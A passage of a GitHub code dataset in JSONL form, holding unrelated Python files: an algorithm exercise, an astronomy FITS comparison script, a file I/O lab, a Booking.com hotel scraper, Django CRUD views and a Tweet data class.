user_table()\r\ndf_user.to_csv(\"/Users/yd953/PycharmProjects/instacard/merge_sample_l.csv\")\r\n\r\n","repo_name":"yalcindavid/instacard","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"22954194086","text":"# For example, given [10, 15, 3, 7] and k of 17, return true since 10 + 7 is 17.\n\n# Bonus: Can you do this in one pass?\n\ndef twoSum(arr, target):\n kv = {}\n for i in range(len(arr)):\n if target - arr[i] in kv:\n return True\n kv[arr[i]] = True\n return False\n\nprint(twoSum([10, 15, 3, 7], 17))\nprint(twoSum([10, 15, 3, 7], 30))\n\n","repo_name":"dongxiaohe/algorithm","sub_path":"daily_coding_problem/p_1.py","file_name":"p_1.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15314655884","text":"from astropy.io import fits\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom astropy.nddata.utils import Cutout2D\nfrom astropy.wcs import WCS\nimport datetime\nimport sys\n\nfrom ..physics import Greybody, Dust, get_instrument\n\nprint('success')\nsys.exit()\n\ndata_dir = \"/n/sgraraid/filaments/Perseus/Herschel/processed/1342190326/\"\ndef fn_gen(band_stub, offset=\"\"):\n if offset:\n offset = \"-plus{:06d}\".format(offset)\n return f\"{data_dir}{band_stub}-image-remapped-conv{offset}.fits\"\ndata_fns = {\n 160: fn_gen(\"PACS160um\", 45),\n 250: fn_gen(\"SPIRE250um\"),\n 350: fn_gen(\"SPIRE350um\"),\n 500: fn_gen(\"SPIRE500um\"),\n}\n\nresult_dir = \"/n/sgraraid/filaments/Perseus/Herschel/results/\"\nresult_fn = \"full-1.5.1-Per1-pow-1000-0.1-1.80.fits\"\nresult_path = f\"{result_dir}{result_fn}\"\n\nframe_key = {}\nwith fits.open(result_path) as hdul:\n for i in range(1, len(hdul)):\n 
frame_key[hdul[i].header['EXTNAME']] = i\n w = WCS(hdul[1].header)\n T, N = (hdul[frame_key[k]].data for k in ('T', 'N(H2)'))\n wavelens = sorted(list(data_fns.keys()))\n mant_diffs = [hdul[frame_key[f'diff{b}']].data for b in wavelens]\n mant_bands = [hdul[frame_key[f'BAND{b}']].data for b in wavelens]\nmant_models = [d+b for d, b in zip(mant_diffs, mant_bands)]\n\nif False:\n center = tuple(x//2 for x in mant_models[0].shape)\n width = 20\n c2d = Cutout2D(T, (center[1], center[0]), (width, width), wcs=w)\n cutout = c2d.slices_original\n for i in range(len(wavelens)):\n for l in (mant_diffs, mant_bands, mant_models):\n l[i] = l[i][cutout]\n T, N = T[cutout], N[cutout]\n w = c2d.wcs\n\nall_things = {f'mant_diff{b}': d for b, d in zip(wavelens, mant_diffs)}\nall_things.update({f'BAND{b}': d for b, d in zip(wavelens, mant_bands)})\nall_things.update({f'manticore{b}': d for b, d in zip(wavelens, mant_models)})\nall_things.update({'T': T, 'N': N})\n\n\nplt.figure()\nfor i, m in enumerate(mant_models):\n plt.subplot(221 + i)\n plt.title(f\"{wavelens[i]}\")\n plt.imshow(m, origin='lower', vmax=np.nanmedian(m)+2*np.nanstd(m))\nplt.gcf().canvas.set_window_title(\"Observations\")\nplt.figure()\nfor i, m in enumerate([T, N]):\n if i:\n m = np.log10(m)\n plt.subplot(121 + i)\n plt.title(\"N\" if i else \"T\")\n plt.imshow(m, origin='lower', vmax=np.nanmedian(m)+2*np.nanstd(m))\n plt.colorbar()\nplt.gcf().canvas.set_window_title(\"Model parameters\")\n\nmantipy_result = np.full((len(wavelens), T.size), np.nan)\nherschel = get_instrument(wavelens)\ndust = Dust(beta=1.80)\nfor i, t, n in zip(range(T.size), T.flat, N.flat):\n if np.isnan(t) | np.isnan(n):\n continue\n else:\n mantipy_result[:, i] = [d.detect(Greybody(t, np.log10(n), dust)) for d in herschel]\nmantipy_result = mantipy_result.reshape(len(wavelens), *(T.shape))\nmantipy_result = [mantipy_result[i] for i in range(len(wavelens))]\n\nplt.figure()\nfor i, m in enumerate(mantipy_result):\n all_things[f'py{wavelens[i]}'] = m\n plt.subplot(221 + i)\n plt.title(f\"{wavelens[i]}\")\n plt.imshow(m, origin='lower', vmax=np.nanmedian(m)+2*np.nanstd(m))\nplt.gcf().canvas.set_window_title(\"mantipython results\")\n\nplt.figure()\nfor i, m_py in enumerate(mantipy_result):\n m_core = mant_models[i]\n diff = m_py - m_core\n all_things[f'pycorediff{wavelens[i]}'] = diff\n difffrac = diff / m_core\n all_things[f'pycorediff_frac{wavelens[i]}'] = difffrac\n plt.subplot(221 + i)\n plt.title(f\"{wavelens[i]}\")\n m = difffrac\n plt.imshow(m, origin='lower', vmax=np.nanmedian(m)+2*np.nanstd(m))\nplt.gcf().canvas.set_window_title(\"final diffs\")\n\nphdu = fits.PrimaryHDU()\nphdu.header['DATE'] = (datetime.datetime.now(datetime.timezone.utc).astimezone().isoformat(), \"File creation date\")\nphdu.header['CREATOR'] = (\"Ramsey: {}\".format(str(__file__)), \"FITS file creator\")\nphdu.header['HISTORY'] = \"This is a comparison on Per1 of manticore vs mantipython\"\nphdu.header['HISTORY'] = \"manticore: {:s}\".format(result_fn)\nphdu.header.update(w.to_header())\nhdu_list = [phdu]\nfor k, v in all_things.items():\n ihdu = fits.ImageHDU(data=v, header=fits.Header())\n ihdu.header.update(w.to_header())\n ihdu.header['EXTNAME'] = k\n ihdu.header['BUNIT'] = \"MJy/sr unless K or cm-2. 
unitless if frac.\"\n if \"py\" in k:\n ihdu.header['HISTORY'] = \"Product of mantipython (Ramsey)\"\n elif \"mant\" in k:\n ihdu.header['HISTORY'] = \"Product of manticore (Kevin)\"\n hdu_list.append(ihdu)\nhdulnew = fits.HDUList(hdu_list)\nhdulnew.writeto(\"/home/rkarim/Research/mantipython/compare_manticore_2.fits\", overwrite=True)\n# plt.show()\n\nprint('done')\n","repo_name":"ramseykarim/mantipython","sub_path":"tests/accuracyVsManticoreTest.py","file_name":"accuracyVsManticoreTest.py","file_ext":"py","file_size_in_byte":4568,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"75404389331","text":"import math\nimport struct\n\ndef compute_expression(x):\n try:\n result = (1 / math.tan(x)) / math.sin(7 * x - 1)\n return result\n except ZeroDivisionError:\n return None\n\ndef read_text_file(file_path):\n with open(file_path, 'r') as file:\n lines = file.readlines()\n return [float(line.strip()) for line in lines]\n\ndef write_text_file(file_path, data):\n with open(file_path, 'w') as file:\n for item in data:\n file.write(f'{item}\\n')\n\ndef read_binary_file(file_path):\n with open(file_path, 'rb') as file:\n data = file.read()\n # Assuming the data is a sequence of double-precision floating-point numbers\n return struct.unpack(f'{len(data) // struct.calcsize(\"d\")}d', data)\n\ndef write_binary_file(file_path, data):\n with open(file_path, 'wb') as file:\n # Convert the list of doubles to a binary string\n binary_data = struct.pack(f'{len(data)}d', *data)\n file.write(binary_data)\n\nif __name__ == \"__main__\":\n # Приклад використання\n x_values = [0.1, 0.2, 0.3, 0.4, 0.5]\n \n # Обчислюємо значення виразу для кожного x\n y_values = [compute_expression(x) for x in x_values]\n\n # Записуємо дані у текстовий файл\n text_file_path = 'output.txt'\n write_text_file(text_file_path, y_values)\n\n # Зчитуємо дані з текстового файлу\n read_data_text = read_text_file(text_file_path)\n print(f'Read from text file: {read_data_text}')\n\n # Записуємо дані у двійковий файл\n binary_file_path = 'output.bin'\n write_binary_file(binary_file_path, y_values)\n\n # Зчитуємо дані з двійкового файлу\n read_data_binary = read_binary_file(binary_file_path)\n print(f'Read from binary file: {read_data_binary}')","repo_name":"dimaxalva/KZPLabs","sub_path":"lab8.py","file_name":"lab8.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"7896647320","text":"#coding=utf-8\r\n\r\n# http://www.booking.com/ 处理booking网站数据\r\n\r\n\r\nimport urllib2\r\nimport re\r\nimport md5\r\nfrom bs4 import BeautifulSoup\r\n\r\nfrom spider_mysqldb import Spider_MySQL_DBProcess\r\nfrom spider_data_base import *\r\nfrom spider_website_base import Spider_Website_Base\r\n\r\n\r\n\r\nclass Spider_Website_Booking(Spider_Website_Base):\r\n ''' 用于爬Booking网站的数据的东东 ''' \r\n \r\n def __init__(self,mysql_process,filesave_dir):\r\n Spider_Website_Base.__init__(self,80001,\"http://www.booking.com\",mysql_process,filesave_dir)\r\n \r\n \r\n def crawlweb_countryurl(self,website_desc,saveto_db=False):\r\n \r\n ret = 0\r\n # 读取国家信息到数据库\r\n #'http://www.booking.com/destination.zh-cn.html'\r\n rsp_content = self.openner_crawlweb(website_desc._country_url)\r\n if (rsp_content == None):\r\n return -1\r\n \r\n self.save_to_file(save_data=saversp_content,\r\n country_id=0,\\\r\n city_id=0,\\\r\n hotel_id=0,\\\r\n page_id=0)\r\n \r\n # 对于HTML文件进行翻译\r\n soup = BeautifulSoup(rsp_content)\r\n # 
this block has no class attribute to key on,\r\n        raw_country_list = soup.find_all(name=\"div\", class_=\"flatList\")\r\n        # parse it once more to strip the div wrappers and such, heh\r\n        soup = BeautifulSoup(str(raw_country_list))\r\n        country_list = soup.find_all(name=\"a\")\r\n        for country_item in country_list :\r\n            country_def = ZQ_Country_Define()\r\n            country_url = ZQ_Website_Country_Url()\r\n            # print country_item\r\n            tag = BeautifulSoup(str(country_item))\r\n            # this check is a bit too naive.\r\n            country_def._country_cn_name = tag.string.strip()\r\n            country_url._website_id = self._website_id\r\n            #internal links need the domain prepended\r\n            country_url._country_city_url = self._website_domain + tag.a['href']\r\n            \r\n            ret,data_count = self._mysql_process.get_country_define(country_def)\r\n            if (ret != 0):\r\n                return ret    \r\n            \r\n            #whoever says Python's indentation is pretty, I'll fight them\r\n            if (data_count == 0) :\r\n                if (saveto_db == True):\r\n                    ret = self._mysql_process.set_country_define(country_def)\r\n                    if (ret != 0):\r\n                        self._logger.info(\"Save this country define %s to database failed.\" % country_def._country_cn_name)\r\n                        return ret    \r\n                else :\r\n                    self._logger.info(\"This country %s was not found in the define table, continuing with the next one\" % country_def._country_cn_name)\r\n                    continue\r\n            #get the configured country ID, then save the crawled data\r\n            country_url._country_id = country_def._country_id\r\n            ret = self._mysql_process.set_website_country_url(country_url)\r\n            if (ret != 0 ):\r\n                self._logger.info(\"Save this country [%d|%s] to database failed.\" \\\r\n                                  % (country_def._country_id,country_def._country_cn_name))\r\n                return ret\r\n            else :\r\n                self._logger.info(\"Save this country desc [%d|%s] to database succeeded.\" \\\r\n                                  % (country_def._country_id,country_def._country_cn_name))\r\n        \r\n        return 0\r\n    \r\n\r\n    \r\n    def crawlweb_cityurl(self, country_url,saveto_db=False):\r\n        ''' '''\r\n        # read the city info into the database\r\n        rsp_content = self.openner_crawlweb(country_url._country_city_url)\r\n        if (rsp_content == None):\r\n            return -1\r\n        \r\n        self.save_to_file(save_data=rsp_content,\r\n                          country_id=country_url._country_id,\\\r\n                          city_id=0,\\\r\n                          hotel_id=0,\\\r\n                          page_id=0)\r\n        \r\n        # parse and process the HTML document,\r\n        soup = BeautifulSoup(rsp_content)\r\n        raw_web_data = soup.find_all(name=\"div\", class_=\"description deslast\")\r\n        \r\n        soup = BeautifulSoup(str(raw_web_data))\r\n        raw_web_data = soup.find_all(name=\"table\", class_=\"general\")\r\n        \r\n        soup = BeautifulSoup(str(raw_web_data))\r\n        city_list = soup.find_all(name=\"a\")\r\n        for city_item in city_list :\r\n            city_def = ZQ_City_Define()\r\n            city_url = ZQ_Website_City_Url()\r\n            # print country_item\r\n            tag = BeautifulSoup(str(city_item))\r\n            # this check is a bit too naive.\r\n            city_def.city_cn_name_ = tag.string.strip()\r\n            city_def._country_id = country_url._country_id\r\n            city_url._website_id = self._website_id\r\n            city_url._country_id = country_url._country_id\r\n            #internal links need the domain prepended\r\n            city_url._city_info_url = self._website_domain + tag.a['href']\r\n            \r\n            ret,data_count = self._mysql_process.get_city_define(city_def)\r\n            if (ret != 0):\r\n                return ret    \r\n            \r\n            #whoever says Python's indentation is pretty, I'll fight them\r\n            if (data_count == 0) :\r\n                if (saveto_db == True):\r\n                    ret = self._mysql_process.set_city_define(city_def)\r\n                    if (ret != 0):\r\n                        self._logger.info(\"Save this city define [%s] to database failed.\" % city_def.city_cn_name_)\r\n                        return ret    \r\n                else :\r\n                    self._logger.info(\"This city define [%s] was not found in the define table, 
continue process next\" % city_def.city_cn_name_)\r\n continue\r\n \r\n #根据city_info的地方得到HOTEL的URL,BOOKING网站比较变态,要跳转2次\r\n #第一次跳转\r\n rsp_content = self.openner_crawlweb(city_url._city_info_url)\r\n if (rsp_content == None):\r\n self._logger.error(\"Get city [%s] info url [%s] fail.\",city_def.city_cn_name_,city_url._city_info_url)\r\n continue\r\n \r\n soup = BeautifulSoup(rsp_content)\r\n raw_web_data = soup.find_all(name=\"p\", class_=\"firstpar\")\r\n \r\n soup = BeautifulSoup(str(raw_web_data))\r\n raw_web_data = soup.find_all(name=\"a\")\r\n tag = BeautifulSoup(str(raw_web_data))\r\n \r\n city_url.city_hotel_url_ = self._website_domain + tag.a['href']\r\n \r\n #第二次跳转,得到真正所有的的CITY酒店连接\r\n rsp_content = self.openner_crawlweb(city_url.city_hotel_url_)\r\n if (rsp_content == None):\r\n self._logger.error(\"Get city [%s] hotel url [%s] fail.\",city_def.city_cn_name_,city_url._city_info_url)\r\n continue\r\n \r\n soup = BeautifulSoup(rsp_content)\r\n raw_web_data = soup.find_all(name=\"p\", class_=\"allhotelsin\")\r\n soup = BeautifulSoup(str(raw_web_data))\r\n raw_web_data = soup.find_all(name=\"a\" , class_=\"all_hotels_in_dest\")\r\n tag = BeautifulSoup(str(raw_web_data))\r\n \r\n if (tag.a != None) :\r\n city_url.all_hotel_url_ = self._website_domain + tag.a['href']\r\n city_url._spider_priority = 100\r\n \r\n #得到配置的国际ID,然后保存抓取的数据\r\n city_url._city_id = city_def._city_id\r\n ret = self._mysql_process.set_website_city_url(city_url)\r\n if (ret != 0 ):\r\n self._logger.info(\"Save this city desc [%s] to database fail.\" % city_def.city_cn_name_)\r\n return ret\r\n else :\r\n self._logger.info(\"Save this city desc [%s] to database success.\" % city_def.city_cn_name_)\r\n return 0 \r\n \r\n\r\n \r\n def __save_hotel_url(self,city_url,hotel_item,saveto_db=False):\r\n ''' ''' \r\n hotel_def = ZQ_Hotel_Define()\r\n hotel_url = ZQ_Website_Hotel_Url()\r\n tag = BeautifulSoup(str(hotel_item))\r\n \r\n hotel_name = tag.string.strip()\r\n hotel_def._hotel_en_name = hotel_name\r\n \r\n #如果里面有中文字符串,提取出来 ,示例CHINA(中国)\r\n bracket_start = hotel_name.find(\"(\")\r\n if bracket_start != -1 and bracket_start > 0:\r\n bracket_end = hotel_name.find(\")\")\r\n if (bracket_end - bracket_start) > 1:\r\n hotel_def._hotel_en_name = (hotel_name[0:bracket_start]).strip()\r\n hotel_def._hotel_cn_name = (hotel_name[bracket_start+1:bracket_end]).strip()\r\n \r\n #print \"[%s|%s]\"%(hotel_def._hotel_en_name,hotel_def._hotel_cn_name)\r\n hotel_def._website_id = self._website_id\r\n hotel_def._country_id = city_url._country_id\r\n hotel_def._city_id = city_url._city_id\r\n\r\n #内部链接要家域名\r\n hotel_url._website_id = self._website_id\r\n hotel_url._country_id = city_url._country_id\r\n hotel_url._city_id = city_url._city_id\r\n hotel_url._hotel_desc_url = self._website_domain + tag.a['href']\r\n ret,data_count = self._mysql_process.get_hotel_define(hotel_def)\r\n if (ret != 0):\r\n return ret \r\n \r\n #谁说Python的缩进好看,我和他急\r\n if (data_count == 0) :\r\n if (saveto_db == True):\r\n ret = self._mysql_process.set_hotel_define(hotel_def)\r\n if (ret != 0):\r\n self._logger.info(\"Save this hotel define [%s] to database fail.\" % hotel_def._hotel_en_name)\r\n return ret \r\n else :\r\n self._logger.info(\"No found this hotel [%s] in define table. 
continue process next\" % hotel_def._hotel_en_name)\r\n return 0\r\n #得到配置的ID,然后保存抓取的数据\r\n hotel_url._hotel_id = hotel_def._hotel_id\r\n ret = self._mysql_process.set_website_hotel_url(hotel_url)\r\n if (ret != 0 ):\r\n self._logger.info(\"Save this hotel url[%s] to database fail.\" % hotel_def._hotel_en_name)\r\n return ret\r\n else :\r\n self._logger.info(\"Save this hotel url [%s] to database success.\" % hotel_def._hotel_en_name)\r\n \r\n return 0 \r\n \r\n def crawlweb_hotelurl(self,city_url,saveto_db=False):\r\n ''' 爬取酒店的URL, '''\r\n ret = 0\r\n city_hotel_count = 0\r\n #对于有多个Hotel的页面进行爬取\r\n if (city_url.all_hotel_url_ != \"\"):\r\n \r\n #有NEXT页面,所以一次抓取一张\r\n crawlweb = city_url.all_hotel_url_\r\n page_count = 0\r\n while (True):\r\n \r\n rsp_content = self.openner_crawlweb(crawlweb)\r\n if (rsp_content == None):\r\n return -1\r\n \r\n self.save_to_file(save_data=rsp_content,\r\n country_id=city_url._country_id,\\\r\n city_id=city_url._city_id,\\\r\n hotel_id=0,\\\r\n page_id=page_count)\r\n \r\n soup = BeautifulSoup(rsp_content)\r\n \r\n hotel_list = soup.find_all(name=\"a\",class_=\"hotel_name_link url \")\r\n next_web_data = soup.find_all(name=\"td\",class_=\"next\")\r\n \r\n for hotel_item in hotel_list :\r\n city_hotel_count += 1\r\n ret = self.__save_hotel_url(city_url,hotel_item,saveto_db)\r\n #如果没有下一页,跳出循环,如果有下一页,重新进行爬取得 \r\n soup = BeautifulSoup(str(next_web_data))\r\n next_web_data = soup.find_all(name=\"a\")\r\n \r\n tag = BeautifulSoup(str(next_web_data))\r\n if (tag.a == None) :\r\n break\r\n crawlweb = self._website_domain + tag.a['href']\r\n page_count += 1\r\n #对于只有少量Hotel信息的页面进行抓取\r\n elif (city_url.city_hotel_url_ != \"\") :\r\n rsp_content = self.openner_crawlweb(city_url.city_hotel_url_)\r\n if (rsp_content == None):\r\n return -1\r\n \r\n self.save_to_file(save_data=rsp_content,\r\n country_id=city_url._country_id,\\\r\n city_id=city_url._city_id,\\\r\n hotel_id=0,\\\r\n page_id=0)\r\n \r\n soup = BeautifulSoup(rsp_content)\r\n table_list = soup.find_all(name=\"table\",class_=\"promos\")\r\n city_hotel_data = table_list[0]\r\n soup = BeautifulSoup(str(city_hotel_data))\r\n hotel_list = soup.find_all(name=\"a\",class_=\"hotelname\")\r\n for hotel_item in hotel_list :\r\n city_hotel_count += 1\r\n ret = self.__save_hotel_url(city_url,hotel_item,saveto_db)\r\n \r\n else :\r\n self._logger.error(\"This city [%d|%d] has no url .\" % (city_url._country_id,city_url._city_id))\r\n \r\n self._logger.info(\"This city [%d|%d] has [%d] url .\" % (city_url._country_id,city_url._city_id,city_hotel_count))\r\n return 0\r\n \r\n #---------------------------------------------------------------------------------------------\r\n\r\n \r\n\r\n \r\n def crawlweb_hoteldesc(self,hotel_url,saveto_db=False):\r\n '''取得酒店的各种信息,描述,图片,房间等 '''\r\n \r\n #TNNNNNND的万里长征终于搞完了第一步 《大龄文艺女青年》 你看 你看 你看她只会做西红柿炒鸡蛋  你看 你看 还要就着方便面\r\n \r\n self._logger.info(\"This hotel [%d] url [%s].\" %\\\r\n (hotel_url._hotel_id,hotel_url._hotel_desc_url))\r\n \r\n \r\n rsp_content = self.openner_crawlweb(hotel_url._hotel_desc_url)\r\n if (rsp_content == None):\r\n return -1\r\n \r\n self.save_to_file(save_data=rsp_content,\r\n country_id=hotel_url._country_id,\\\r\n city_id=hotel_url._city_id,\\\r\n hotel_id=hotel_url._hotel_id,\\\r\n page_id=0)\r\n soup = BeautifulSoup(rsp_content)\r\n \r\n hotel_desc = ZQ_Website_Hotel_Desc()\r\n hotel_desc._website_id = hotel_url._website_id\r\n hotel_desc._hotel_id = hotel_url._hotel_id\r\n hotel_desc.desc_lanuage_ = 1\r\n \r\n #find_all(limit=1) 和find功能一致\r\n item_average = 
soup.find(name=\"span\",attrs={\"class\":\"average\"})\r\n item_star = soup.find(name=\"span\",attrs={\"class\":re.compile(\"use_sprites\")})\r\n item_desc = soup.find(name=\"div\",id=\"summary\")\r\n item_number = soup.find(name=\"p\",attrs={\"class\":re.compile(\"summary\")})\r\n item_facility = soup.find_all(name=\"p\",class_=\"firstpar\")\r\n item_net = soup.find(name=\"div\",attrs={\"id\":\"internet_policy\"})\r\n item_park = soup.find(name=\"div\",attrs={\"id\":\"parking_policy\"})\r\n item_policies = soup.find(name=\"div\", attrs={\"id\":\"hotelPoliciesInc\",\"class\":\"descriptionsContainer\"})\r\n item_potho = soup.find(name=\"div\",attrs={\"class\":\"photo_collage base_collage\"})\r\n \r\n \r\n #取得得分,#这儿会取得好几个分数,因为页面下面还有其他推荐,我值取第一个,目前看是就是这个酒店。\r\n if (item_average != None):\r\n tag = BeautifulSoup(str(item_average))\r\n hotel_desc.average_ = tag.string.strip()\r\n else:\r\n self._logger.error(\"This hotel page [%d|%d] don't get average .\" % \\\r\n (hotel_url._website_id,hotel_url._hotel_id))\r\n \r\n #取得星级,这儿会取得好几个分数,因为页面下面还有其他推荐,我值取第一个,目前看是就是这个酒店。\r\n if (item_star != None):\r\n tag = BeautifulSoup(str(item_star))\r\n hotel_desc.hotel_star_ = tag.span['title']\r\n else:\r\n self._logger.error(\"This hotel page [%d|%d] don't get star .\" % \\\r\n (hotel_url._website_id,hotel_url._hotel_id)) \r\n \r\n #读的描述\r\n if (item_desc != None):\r\n soup = BeautifulSoup(str(item_desc))\r\n desc_list = soup.find_all(name=\"p\")\r\n for desc_item in desc_list :\r\n tag = BeautifulSoup(str(desc_item))\r\n if (tag.string != None) :\r\n hotel_desc.hotel_desc_ += tag.string.strip()\r\n hotel_desc.hotel_desc_ += \"\\n\"\r\n else:\r\n self._logger.error(\"This hotel page [%d|%d] don't get desc .\" % \\\r\n (hotel_url._website_id,hotel_url._hotel_id))\r\n \r\n #读的房间数量 \r\n if (item_number != None):\r\n soup = BeautifulSoup(str(item_number))\r\n hotel_desc.room_number_ = soup.text\r\n else:\r\n self._logger.error(\"This hotel page [%d|%d] don't get room number .\" % \\\r\n (hotel_url._website_id,hotel_url._hotel_id))\r\n #对设施字段进行处理\r\n if (item_facility != []):\r\n len_facility = len(item_facility)\r\n \r\n if (len_facility >= 2):\r\n tag = BeautifulSoup(str(item_facility[0]))\r\n hotel_desc.room_services_ = tag.string\r\n tag = BeautifulSoup(str(item_facility[1]))\r\n hotel_desc.hotel_services_ = tag.string\r\n if (len_facility >= 3):\r\n tag = BeautifulSoup(str(item_facility[0]))\r\n hotel_desc.room_services_ = tag.string\r\n tag = BeautifulSoup(str(item_facility[1]))\r\n hotel_desc.entertainment_ = tag.string\r\n tag = BeautifulSoup(str(item_facility[2]))\r\n hotel_desc.hotel_services_ = tag.string\r\n else:\r\n self._logger.error(\"This hotel page [%d|%d] don't get facility .\" % \\\r\n (hotel_url._website_id,hotel_url._hotel_id))\r\n #对设施字段进行处理\r\n\r\n #处理网络信息 \r\n if (item_net != None):\r\n soup = BeautifulSoup(str(item_net))\r\n item_net = soup.find(name=\"p\")\r\n soup = BeautifulSoup(str(item_net))\r\n hotel_desc.net_facility_ = soup.p.get_text().strip().replace(\"\\n\",\"\") \r\n else:\r\n self._logger.error(\"This hotel page [%d|%d] don't get internet .\" % \\\r\n (hotel_url._website_id,hotel_url._hotel_id))\r\n \r\n #处理停车位的信息 \r\n if (item_park != None):\r\n \r\n soup = BeautifulSoup(str(item_park))\r\n item_net = soup.find(name=\"p\")\r\n soup = BeautifulSoup(str(item_park))\r\n hotel_desc.hotel_park_ = soup.p.get_text().strip().replace(\"\\n\",\"\") \r\n else:\r\n self._logger.error(\"This hotel page [%d|%d] don't get park .\" % \\\r\n (hotel_url._website_id,hotel_url._hotel_id))\r\n 
\r\n        #爬取酒店政策字段\r\n        if (item_policies != None):\r\n            \r\n            #去掉注释\r\n            soup = BeautifulSoup(re.sub(r\"<!--.*?-->\",\"\",str(item_policies)))\r\n            item_list = soup.find_all(name=\"div\",attrs={\"class\":\"description\"})\r\n            policies_count = 0\r\n            for item in item_list :\r\n                policies_count += 1\r\n                soup = BeautifulSoup(str(item))\r\n                key_string = soup.find(name=\"span\")\r\n                value_string = soup.find(name=\"p\")\r\n                if (key_string == None or value_string == None):\r\n                    break\r\n                if (policies_count < 6):\r\n                    hotel_desc.hotel_policy_ += key_string.get_text() + \":\"\r\n                    hotel_desc.hotel_policy_ += value_string.get_text().strip().replace(\"\\n\",\"\") \r\n                    hotel_desc.hotel_policy_ += \"\\n\"\r\n                else:\r\n                    hotel_desc.credit_card_ = key_string.get_text() + \":\" + value_string.get_text().strip().replace(\"\\n\",\"\") \r\n            \r\n        else:\r\n            self._logger.error(\"This hotel page [%d|%d] don't get policies .\" % \\\r\n                (hotel_url._website_id,hotel_url._hotel_id))\r\n        \r\n        ret = self._mysql_process.set_website_hotel_desc(hotel_desc)\r\n        if (ret != 0 ):\r\n            self._logger.error(\"Save this hotel desc [%d|%d] to database fail.\" % \\\r\n                (hotel_url._website_id,hotel_url._hotel_id))\r\n            return ret\r\n        else :\r\n            self._logger.info(\"Save this hotel desc [%d|%d] to database success.\" % \\\r\n                (hotel_url._website_id,hotel_url._hotel_id))\r\n        \r\n        #处理图片信息\r\n        pic_list = []\r\n        if (item_potho != None):\r\n            soup = BeautifulSoup(str(item_potho))\r\n            pic_script = soup.find(name=\"script\")\r\n            \r\n            line_list = str(pic_script).splitlines()\r\n            \r\n            for str_line in line_list :\r\n                pic_url_group = re.search(r\"http://.*?\\.jpg\",str_line)\r\n                if pic_url_group != None:\r\n                    pic_list.append(pic_url_group.group())\r\n            \r\n        else:\r\n            self._logger.error(\"This hotel page [%d|%d] don't get photo link .\" % \\\r\n                (hotel_url._website_id,hotel_url._hotel_id))\r\n        \r\n        #将所有的图片信息存放到DB中,以备以后抓取\r\n        for pic_url in pic_list :\r\n            zq_photo_url = ZQ_Website_Hotel_Picture()\r\n            zq_photo_url._website_id = hotel_url._website_id\r\n            zq_photo_url._hotel_id = hotel_url._hotel_id\r\n            zq_photo_url._picture_url = pic_url\r\n            \r\n            #每个URL单独新建MD5对象,否则update会累积之前所有URL的摘要\r\n            md5_fun = md5.new()\r\n            md5_fun.update(pic_url)\r\n            zq_photo_url._picture_url_md5 = md5_fun.hexdigest() \r\n            ret = self._mysql_process.set_website_hotel_picture(zq_photo_url)\r\n            if ( ret != 0 ):\r\n                self._logger.error(\"This hotel page [%d|%d] picture url[%s] save fail .\" % \\\r\n                    (hotel_url._website_id,hotel_url._hotel_id,zq_photo_url._picture_url))\r\n        self._logger.info(\"This hotel page [%d|%d] has number [%d] picture.\"%\\\r\n            (hotel_url._website_id,hotel_url._hotel_id,len(pic_list)))    \r\n        return 0 \r\n\r\nif __name__ == \"__main__\":\r\n    # print (content)\r\n    test_spider = Spider_Website_Booking()\r\n    test_spider.crawlweb_countryurl()\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"BGCX261/zouqi-svn-to-git","sub_path":"trunk/src/spider/spider_website_booking.py","file_name":"spider_website_booking.py","file_ext":"py","file_size_in_byte":22684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"29844308901","text":"from django.shortcuts import render, redirect, get_object_or_404,HttpResponse\nfrom django.urls import reverse\nfrom .models import MyData\nfrom .form import CreateDataForm, UpdateDataForm\n\n# Create your views here.\n\n\ndef list_data(request):\n    data = MyData.objects.all()\n    context = {\n        'data': data,\n    }\n    return render(request, 'index.html', context)\n\n\ndef create_data(request):\n    if request.method == 'POST':\n        form = CreateDataForm(request.POST, request.FILES)\n        
if form.is_valid():\n form.save()\n return redirect('/')\n else:\n form = CreateDataForm()\n \n context = {\n 'creation_form': form,\n }\n return render(request, 'add_data.html', context)\n\n\ndef update_data(request,pk):\n # data = MyData.objects.get(pk=pk)\n data = get_object_or_404(MyData,pk=pk)\n if request.method == 'POST':\n form = UpdateDataForm(request.POST,request.FILES,instance=data)\n if form.is_valid():\n form.save()\n # return redirect('/')\n return redirect(reverse('home:list_data'))\n else:\n form = UpdateDataForm(instance=data)\n \n context = {\n 'update_form': form,\n }\n return render(request, 'edit_data.html', context)\n\n\ndef destroy_data(request,pk):\n data = get_object_or_404(MyData,pk=pk)\n data.delete()\n return redirect('/')\n","repo_name":"Abdallah-Ibra/django_course_1_vision","sub_path":"CRUD System/home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36542895789","text":"class Tweet:\n #prueba\n\n def __init__(self,fecha, usuario, recuperados,nuevosCasos,fallecidos,muestras,pcr,antigeno,totalRecuperados,totalCasos,totalFallecidos,totalMuestrasPorcesadas,totalActivos):\n self.fecha = fecha \n self.usuario = usuario \n self.recuperados = recuperados \n self.nuevosCasos = nuevosCasos \n self.fallecidos = fallecidos \n self.muestras = muestras \n self.pcr = pcr \n self.antigeno = antigeno \n self.totalRecuperados = totalRecuperados \n self.totalCasos = totalCasos \n self.totalFallecidos = totalFallecidos \n self.totalMuestrasPorcesadas = totalMuestrasPorcesadas \n self.totalActivos = totalActivos\n\n def toDBColecction(self):\n return{\n 'fecha':self.fecha ,\n 'usuario':self.usuario ,\n 'recuperados':self.recuperados ,\n 'nuevosCasos':self.nuevosCasos , \n 'fallecidos':self.fallecidos , \n 'muestras':self.muestras ,\n 'pcr':self.pcr ,\n 'antigeno':self.antigeno ,\n 'totalRecuperados':self.totalRecuperados , \n 'totalCasos':self.totalCasos ,\n 'totalFallecidos':self.totalFallecidos ,\n 'totalMuestrasPorcesadas':self.totalMuestrasPorcesadas ,\n 